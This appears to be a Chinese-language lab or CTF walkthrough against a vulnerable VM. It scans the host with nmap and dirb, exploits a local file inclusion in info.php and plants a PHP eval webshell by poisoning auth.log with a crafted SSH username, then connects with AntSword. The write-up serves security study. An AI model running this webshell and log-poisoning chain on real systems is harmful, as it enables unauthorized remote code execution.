一、信息收集
1.主机发现
我们把虚拟机改为NAT模式,利用真实机的VMnet8 IP,将虚拟机的IP扫出来。
访问页面
2.主机扫描
这里使用的工具是Nmap来进行的主机扫描,使用命令如下:
nmap -A 192.168.222.133 -p-
如下图扫描结果,发现开放了21,80,2211,8888端口
3.目录扫描
既然开放了80端口,那么肯定要进行一次目录扫描,使用命令如下
dirb http://192.168.222.133
扫描结果如下,发现并没有多少东西,但是感觉第一个有东西
如下图访问目录antibot_image目录,如下图,发现了一堆东西
4.网页收集
其实经过搜索,看源代码,看网络,在
http://192.168.222.133/antibot_image/antibots/info.php
这个地址下面查看源代码发现了东西,如下图。
二、漏洞利用
1.文件包含漏洞
经过上面信息收集,我们发现antibot_image在这个目录下面有一堆东西,然后看代码include是包含,如下图经过测试发现拥有文件包含漏洞,这里的测试是读取/etc/passwd
在思考如何利用的时候,想到,可以尝试读取/var/log/auth.log这个文件,这个文件用处如下:
/var/ log / auth.log 这是一个文本文件,记录了所有和用户认证相关的 日志 。 无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。
接下来就可以在日志里面写入一句话木马了,如下图,使用ssh连接失败日志写入一句木马。
ssh ' <?php @eval($_POST[cmd]);?> '@192.168.222.133 -p 2211
然后我们使用蚁剑验证一下是否有数据连接,是否成功,如下图,发现是成功的,url地址是
http://192.168.94.30/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
连接成功
Meet.meet